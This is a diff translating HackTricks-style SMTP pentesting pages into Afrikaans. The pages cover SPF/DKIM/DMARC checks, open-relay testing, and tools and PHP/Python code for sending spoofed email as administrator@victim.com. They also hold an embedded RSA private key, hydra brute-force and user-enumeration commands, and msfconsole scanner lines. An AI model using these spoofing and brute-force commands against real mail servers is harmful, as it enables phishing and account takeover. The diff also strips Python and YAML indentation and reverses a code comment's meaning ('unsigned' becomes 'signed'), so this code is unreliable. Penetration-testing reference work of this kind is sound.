 
-Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result:
+Elke meganisme binne die beleid kan voorafgegaan word deur een van vier kwalifiseerders om die bedoelde resultaat te definieer:
 
-* **`+`**: Corresponds to a PASS result. By default, mechanisms assume this qualifier, making `+mx` equivalent to `mx`.
-* **`?`**: Represents a NEUTRAL result, treated similarly to NONE (no specific policy).
-* **`~`**: Denotes SOFTFAIL, serving as a middle ground between NEUTRAL and FAIL. Emails meeting this result are typically accepted but marked accordingly.
-* **`-`**: Indicates FAIL, suggesting that the email should be outright rejected.
-
-In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy:
+* **`+`**: Kom ooreen met 'n SUKSES-resultaat. Standaard aanvaar meganismes hierdie kwalifiseerder, wat `+mx` gelykstaande maak aan `mx`.
+* **`?`**: Verteenwoordig 'n NEUTRALE resultaat, wat op dieselfde wyse as GEEN (geen spesifieke beleid) hanteer word.
+* **`~`**: Dui op SOFTFAIL, as 'n middeweg tussen NEUTRAAL en MISLUK. E-posse wat aan hierdie resultaat voldoen, word tipies aanvaar maar dienooreenkomstig gemerk.
+* **`-`**: Dui op MISLUK, wat aandui dat die e-pos heeltemal verwerp moet word.
 
+In die volgende voorbeeld word die **SPF-beleid van google.com** geïllustreer. Let op die insluiting van SPF-beleide van verskillende domeine binne die eerste SPF-beleid:
 ```shell-session
 dig txt google.com | grep spf
 google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"
@@ -324,31 +435,27 @@ _netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36
 dig txt _netblocks3.google.com | grep spf
 _netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
 ```
+Tradisioneel was dit moontlik om enige domeinnaam te vervals wat nie 'n korrekte/geen SPF-rekord gehad het nie. **Vandag**, as 'n **e-pos** afkomstig is van 'n **domein sonder 'n geldige SPF-rekord**, sal dit waarskynlik **automaties afgekeur/gemerk word as onbetroubaar**.
 
-Traditionally it was possible to spoof any domain name that didn't have a correct/any SPF record. **Nowadays**, if **email** comes from a **domain without a valid SPF record** is probably going to be **rejected/marked as untrusted automatically**.
-
-To check the SPF of a domain you can use online tools like: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)
+Om die SPF van 'n domein te kontroleer, kan jy aanlynhulpmiddels soos [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html) gebruik.
 
 ### DKIM (DomainKeys Identified Mail)
 
-DKIM is utilized to sign outbound emails, allowing their validation by external Mail Transfer Agents (MTAs) through the retrieval of the domain's public key from DNS. This public key is located in a domain's TXT record. To access this key, one must know both the selector and the domain name.
+DKIM word gebruik om uitgaande e-posse te onderteken, sodat hulle deur eksterne Mail Transfer Agents (MTA's) gevalideer kan word deur die ophaling van die domein se openbare sleutel uit DNS. Hierdie openbare sleutel word in 'n domein se TXT-rekord gevind. Om toegang tot hierdie sleutel te verkry, moet jy beide die selekteerder en die domeinnaam weet.
 
-For instance, to request the key, the domain name and selector are essential. These can be found in the mail header `DKIM-Signature`, e.g., `d=gmail.com;s=20120113`.
-
-A command to fetch this information might look like:
+Byvoorbeeld, om die sleutel aan te vra, is die domeinnaam en selekteerder noodsaaklik. Hierdie kan gevind word in die e-poskop 'DKIM-Signature', bv. `d=gmail.com;s=20120113`.
 
+'n Opdrag om hierdie inligting op te haal kan so lyk:
 ```bash
 dig 20120113._domainkey.gmail.com TXT | grep p=
 # This command would return something like:
 20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
 ```
-
 ### DMARC (Domain-based Message Authentication, Reporting & Conformance)
 
-DMARC enhances email security by building on SPF and DKIM protocols. It outlines policies that guide mail servers in the handling of emails from a specific domain, including how to deal with authentication failures and where to send reports about email processing actions.
-
-**To obtain the DMARC record, you need to query the subdomain \_dmarc**
+DMARC verbeter e-possekuriteit deur voort te bou op die SPF- en DKIM-protokolle. Dit stel beleide op wat posbedieners lei in die hantering van e-posse van 'n spesifieke domein, insluitend hoe om te werk met verifikasiefoute en waar om verslae oor e-posverwerkingstake te stuur.
 
+**Om die DMARC-rekord te verkry, moet jy die subdomein \_dmarc ondervra**
 ```bash
 # Reject
 dig _dmarc.facebook.com txt | grep DMARC
@@ -362,79 +469,70 @@ _dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-repor
 dig _dmarc.bing.com txt | grep DMARC
 _dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"
 ```
+#### DMARC-etikette
 
-#### DMARC tags
+| Etiketnaam | Doel                                          | Voorbeeld                       |
+| ---------- | --------------------------------------------- | ------------------------------- |
+| v          | Protokolverise                                 | v=DMARC1                        |
+| pct        | Persentasie van boodskappe wat gefiltreer word | pct=20                          |
+| ruf        | Verslagdoenings-URI vir forensiese verslae     | ruf=mailto:authfail@example.com |
+| rua        | Verslagdoenings-URI van saamgestelde verslae    | rua=mailto:aggrep@example.com   |
+| p          | Beleid vir organisatoriese domein               | p=quarantine                    |
+| sp         | Beleid vir subdomeine van die OD                | sp=reject                       |
+| adkim      | Uitlyningmodus vir DKIM                        | adkim=s                         |
+| aspf       | Uitlyningmodus vir SPF                         | aspf=r                          |
 
-| Tag Name | Purpose                                       | Sample                          |
-| -------- | --------------------------------------------- | ------------------------------- |
-| v        | Protocol version                              | v=DMARC1                        |
-| pct      | Percentage of messages subjected to filtering | pct=20                          |
-| ruf      | Reporting URI for forensic reports            | ruf=mailto:authfail@example.com |
-| rua      | Reporting URI of aggregate reports            | rua=mailto:aggrep@example.com   |
-| p        | Policy for organizational domain              | p=quarantine                    |
-| sp       | Policy for subdomains of the OD               | sp=reject                       |
-| adkim    | Alignment mode for DKIM                       | adkim=s                         |
-| aspf     | Alignment mode for SPF                        | aspf=r                          |
+### **Wat van Subdomeine?**
 
-### **What about Subdomains?**
+**Van** [**hier**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
+Jy moet afsonderlike SPF-rekords hê vir elke subdomein waarvandaan jy e-pos wil stuur.\
+Die volgende is oorspronklik geplaas op openspf.org, wat vroeër 'n goeie bron vir hierdie soort dinge was.
 
-**From** [**here**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
-You need to have separate SPF records for each subdomain you wish to send mail from.\
-The following was originally posted on openspf.org, which used to be a great resource for this kind of thing.
-
-> The Demon Question: What about subdomains?
+> Die Demon-vraag: Wat van subdomeine?
 >
-> If I get mail from pielovers.demon.co.uk, and there's no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn't make sense for Demon's policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.
+> As ek e-pos van pielovers.demon.co.uk kry en daar is geen SPF-data vir pielovers nie, moet ek dan een vlak terug gaan en SPF vir demon.co.uk toets? Nee. Elke subdomein by Demon is 'n ander kliënt, en elke kliënt kan sy eie beleid hê. Dit sou nie sin maak vir Demon se beleid om standaard op al sy kliënte van toepassing te wees nie; as Demon dit wil doen, kan dit SPF-rekords vir elke subdomein opstel.
 >
-> So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.
+> Die advies aan SPF-uitgewers is dus: jy moet 'n SPF-rekord vir elke subdomein of gasheernaam wat 'n A- of MX-rekord het, byvoeg.
 >
-> Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: \* IN TXT "v=spf1 -all"
+> Webwerwe met wildekaart-A- of MX-rekords moet ook 'n wildekaart SPF-rekord hê, van die vorm: \* IN TXT "v=spf1 -all"
 
-This makes sense - a subdomain may very well be in a different geographical location and have a very different SPF definition.
+Dit maak sin - 'n subdomein kan heeltemal in 'n ander geografiese ligging wees en 'n baie ander SPF-definisie hê.
 
-### **Open Relay**
+### **Oop Relais**
 
-When emails are sent, ensuring they don't get flagged as spam is crucial. This is often achieved through the use of a **relay server that is trusted by the recipient**. However, a common challenge is that administrators might not be fully aware of which **IP ranges are safe to allow**. This lack of understanding can lead to mistakes in setting up the SMTP server, a risk frequently identified in security assessments.
-
-A workaround that some administrators use to avoid email delivery issues, especially concerning communications with potential or ongoing clients, is to **allow connections from any IP address**. This is done by configuring the SMTP server's `mynetworks` parameter to accept all IP addresses, as shown below:
+Wanneer e-posse gestuur word, is dit belangrik om te verseker dat hulle nie as spam geïdentifiseer word nie. Dit word dikwels bereik deur die gebruik van 'n **relaisbediener wat deur die ontvanger vertrou word**. Tog is 'n algemene uitdaging dat administrateurs dalk nie ten volle bewus is van watter **IP-reekse veilig is om toe te laat nie**. Hierdie gebrek aan begrip kan lei tot foute in die opstel van die SMTP-bediener, 'n risiko wat gereeld geïdentifiseer word in sekuriteitsassesserings.
 
+'n Omweg wat sommige administrateurs gebruik om e-posleweringprobleme te vermy, veral met betrekking tot kommunikasie met potensiële of lopende kliënte, is om **verbinding vanaf enige IP-adres toe te laat**. Dit word gedoen deur die `mynetworks`-parameter van die SMTP-bediener te konfigureer om alle IP-adresse te aanvaar, soos hieronder gewys:
 ```bash
 mynetworks = 0.0.0.0/0
 ```
-
-For checking whether a mail server is an open relay (which means it could forward email from any external source), the `nmap` tool is commonly used. It includes a specific script designed to test this. The command to conduct a verbose scan on a server (for example, with IP 10.10.10.10) on port 25 using `nmap` is:
-
+Om te bepaal of 'n posdiens 'n oop relê is (wat beteken dat dit e-pos van enige eksterne bron kan deurstuur), word die `nmap`-instrument gewoonlik gebruik. Dit sluit 'n spesifieke skrips in wat ontwerp is om dit te toets. Die opdrag om 'n uitvoerige skandering op 'n bediener uit te voer (byvoorbeeld met IP 10.10.10.10) op poort 25 met behulp van `nmap` is:
 ```bash
 nmap -p25 --script smtp-open-relay 10.10.10.10 -v
 ```
+### **Gereedskap**
 
+* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Kyk vir SPF- en DMARC-misconfigurations**
+* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Kry outomaties SPF- en DMARC-configs**
 
-### **Tools**
-
-* [**https://github.com/serain/mailspoof**](https://github.com/serain/mailspoof) **Check for SPF and DMARC misconfigurations**
-* [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/) **Automatically get SPF and DMARC configs**
-
-### Send Spoof Email
+### Stuur Spoof E-pos
 
 * [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
 * [**http://www.anonymailer.net/**](http://www.anonymailer.net)
 * [**https://emkei.cz/**](https://emkei.cz/)
 
-**Or you could use a tool:**
+**Of jy kan 'n instrument gebruik:**
 
 * [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)
-
 ```bash
 # This will send a test email from test@victim.com to destination@gmail.com
 python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
 # But you can also modify more options of the email
 python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com
 ```
-
 {% hint style="warning" %}
-If you get any **error using in the dkim python lib** parsing the key feel free to use this following one.\
-**NOTE**: This is just a dirty fix to do quick checks in cases where for some reason the openssl private key **cannot be parsed by dkim**.
-
+As jy enige **fout kry by die gebruik van die dkim python-biblioteek** om die sleutel te ontled, voel vry om hierdie volgende een te gebruik.\
+**NOTA**: Dit is net 'n vinnige oplossing om vinnige kontroles te doen in gevalle waar die openssl privaatsleutel **nie deur dkim ontled kan word nie**.
 ```
 -----BEGIN RSA PRIVATE KEY-----
 MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
@@ -454,12 +552,12 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
 ```
 {% endhint %}
 
-**Or you could do it manually:**
+**Of jy kan dit ook handmatig doen:**
 
 {% tabs %}
 {% tab title="PHP" %}
-
# This will send an unsigned message
-mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
+
# Dit sal 'n ondertekende boodskap stuur
+mail("jou_email@gmail.com", "Toets onderwerp!", "hallo! Dit is 'n toets", "Van: administrator@slagoffer.com");
 

 {% endtab %}
 
@@ -480,10 +578,10 @@ sender="administrator@victim.com"
 subject="Test"
 message_html="""
 
-	
-		
This is a test, not a scam

-		

-	
+
+
This is a test, not a scam

+

+
 
 """
 sender_domain=sender.split("@")[1]
@@ -496,7 +594,7 @@ os.system("systemctl restart postfix")
 dkim_private_key_path="dkimprivatekey.pem"
 os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
 with open(dkim_private_key_path) as fh:
-    dkim_private_key = fh.read()
+dkim_private_key = fh.read()
 
 # Generate email
 msg = MIMEMultipart("alternative")
@@ -522,110 +620,106 @@ s.sendmail(sender, [destination], msg_data)
 {% endtab %}
 {% endtabs %}
 
-### **More info**
+### **Meer inligting**
 
-**Find more information about these protections in** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
+**Vind meer inligting oor hierdie beskermings in** [**https://seanthegeek.net/459/demystifying-dmarc/**](https://seanthegeek.net/459/demystifying-dmarc/)
 
-### **Other phishing indicators**
+### **Ander hengelindikators**
 
-* Domain’s age
-* Links pointing to IP addresses
-* Link manipulation techniques
-* Suspicious (uncommon) attachments
-* Broken email content
-* Values used that are different to those of the mail headers
-* Existence of a valid and trusted SSL certificate
-* Submission of the page to web content filtering sites
+* Ouderdom van die domein
+* Skakels wat na IP-adresse wys
+* Skakel manipulasie tegnieke
+* Verdagte (ongewone) aanhegsels
+* Gebreekte e-pos inhoud
+* Waardes wat verskil van die poskoppe
+* Bestaan van 'n geldige en vertroude SSL-sertifikaat
+* Indiening van die bladsy by webinhoudsfiltering-sites
 
-## Exfiltration through SMTP
+## Uitlekking deur SMTP
 
-**If you can send data via SMTP** [**read this**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
+**As jy data via SMTP kan stuur** [**lees hierdie**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
 
-## Config file
+## Konfigurasie lêer
 
 ### Postfix
 
-Usually, if installed, in `/etc/postfix/master.cf` contains **scripts to execute** when for example a new mail is receipted by a user. For example the line `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` means that `/etc/postfix/filtering` will be executed if a new mail is received by the user mark.
-
-Other config files:
+Gewoonlik bevat `/etc/postfix/master.cf`, as dit geïnstalleer is, **skripte om uit te voer** wanneer byvoorbeeld 'n nuwe e-pos deur 'n gebruiker ontvang word. Byvoorbeeld die lyn `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` beteken dat `/etc/postfix/filtering` uitgevoer sal word as 'n nuwe e-pos deur die gebruiker mark ontvang word.
 
+Ander konfigurasie lêers:
 ```
 sendmail.cf
 submit.cf
 ```
-
-## References
+## Verwysings
 * [https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/](https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/)
 * [https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/](https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/)
 
-## HackTricks Automatic Commands
-
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
 Port_Number:  25,465,587     #Comma separated if there is more than one.
 Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for SMTP
-  Note: |
-    SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
+Name: Notes
+Description: Notes for SMTP
+Note: |
+SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
 
-    https://book.hacktricks.xyz/pentesting/pentesting-smtp
+https://book.hacktricks.xyz/pentesting/pentesting-smtp
 
 Entry_2:
-  Name: Banner Grab
-  Description: Grab SMTP Banner
-  Command: nc -vn {IP} 25
+Name: Banner Grab
+Description: Grab SMTP Banner
+Command: nc -vn {IP} 25
 
 Entry_3:
-  Name: SMTP Vuln Scan
-  Description: SMTP Vuln Scan With Nmap
-  Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
+Name: SMTP Vuln Scan
+Description: SMTP Vuln Scan With Nmap
+Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}
 
 Entry_4:
-  Name: SMTP User Enum
-  Description: Enumerate uses with smtp-user-enum
-  Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
+Name: SMTP User Enum
+Description: Enumerate uses with smtp-user-enum
+Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
 
 Entry_5:
-  Name: SMTPS Connect
-  Description: Attempt to connect to SMTPS two different ways
-  Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
+Name: SMTPS Connect
+Description: Attempt to connect to SMTPS two different ways
+Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587
 
 Entry_6:
-  Name: Find MX Servers
-  Description: Find MX servers of an organization
-  Command: dig +short mx {Domain_Name}
+Name: Find MX Servers
+Description: Find MX servers of an organization
+Command: dig +short mx {Domain_Name}
 
 Entry_7:
-  Name: Hydra Brute Force
-  Description: Need Nothing
-  Command: hydra -P {Big_Passwordlist} {IP} smtp -V
-  
+Name: Hydra Brute Force
+Description: Need Nothing
+Command: hydra -P {Big_Passwordlist} {IP} smtp -V
+
 Entry_8:
-  Name: consolesless mfs enumeration
-  Description: SMTP enumeration without the need to run msfconsole
-  Note: sourced from https://github.com/carlospolop/legion
-  Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit' 
+Name: consolesless mfs enumeration
+Description: SMTP enumeration without the need to run msfconsole
+Note: sourced from https://github.com/carlospolop/legion
+Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
 
 ```
-
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van verkenningswerk tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te bespaar om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-smtp/smtp-commands.md b/network-services-pentesting/pentesting-smtp/smtp-commands.md
index ee4d3a8df..b2ac389e4 100644
--- a/network-services-pentesting/pentesting-smtp/smtp-commands.md
+++ b/network-services-pentesting/pentesting-smtp/smtp-commands.md
@@ -1,82 +1,82 @@
-# SMTP - Commands
+# SMTP - Opdragte
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-**Commands from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
+**Opdragte vanaf:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)
 
 **HELO**\
-It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
+Dit is die eerste SMTP-opdrag: dit begin die gesprek deur die sender-bediener te identifiseer en word gewoonlik gevolg deur sy domeinnaam.
 
 **EHLO**\
-An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
+'n Alternatiewe opdrag om die gesprek te begin, wat aandui dat die bediener die Uitgebreide SMTP-protokol gebruik.
 
 **MAIL FROM**\
-With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
+Met hierdie SMTP-opdrag begin die operasies: die sender gee die bron-e-posadres in die "Van" veld aan en begin werklik die e-pos oordra.
 
 **RCPT TO**\
-It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
+Dit identifiseer die ontvanger van die e-pos; as daar meer as een is, word die opdrag eenvoudig adres vir adres herhaal.
 
 **SIZE**\
-This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
+Hierdie SMTP-opdrag gee die afgelewerde bediener inligting oor die geskatte grootte (in terme van bytes) van die gehegte e-pos. Dit kan ook gebruik word om die maksimum grootte van 'n boodskap wat deur die bediener aanvaar moet word, te rapporteer.
 
 **DATA**\
-With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
+Met die DATA-opdrag begin die oordrag van die e-posinhoud; dit word gewoonlik gevolg deur 'n 354 antwoordkode wat deur die bediener gegee word, wat die toestemming gee om die werklike oordrag te begin.
 
 **VRFY**\
-The server is asked to verify whether a particular email address or username actually exists.
+Daar word aan die bediener gevra om te verifieer of 'n spesifieke e-posadres of gebruikersnaam werklik bestaan.
 
 **TURN**\
-This command is used to invert roles between the client and the server, without the need to run a new connaction.
+Hierdie opdrag word gebruik om die rolle tussen die kliënt en die bediener om te keer, sonder om 'n nuwe verbinding te maak.
 
 **AUTH**\
-With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
+Met die AUTH-opdrag stel die kliënt homself aan die bediener bekend deur sy gebruikersnaam en wagwoord te gee. Dit is 'n ander laag van sekuriteit om 'n behoorlike oordrag te waarborg.
 
 **RSET**\
-It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).
+Dit deel die bediener mee dat die aan die gang gesette e-posoordrag beëindig gaan word, alhoewel die SMTP-gesprek nie sal sluit nie (soos in die geval van QUIT).
 
 **EXPN**\
-This SMTP command asks for a confirmation about the identification of a mailing list.
+Hierdie SMTP-opdrag vra vir bevestiging oor die identifikasie van 'n poslys.
 
 **HELP**\
-It’s a client’s request for some information that can be useful for the a successful transfer of the email.
+Dit is 'n versoek van die kliënt vir inligting wat nuttig kan wees vir die suksesvolle oordrag van die e-pos.
 
 **QUIT**\
-It terminates the SMTP conversation.
+Dit beëindig die SMTP-gesprek.
 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
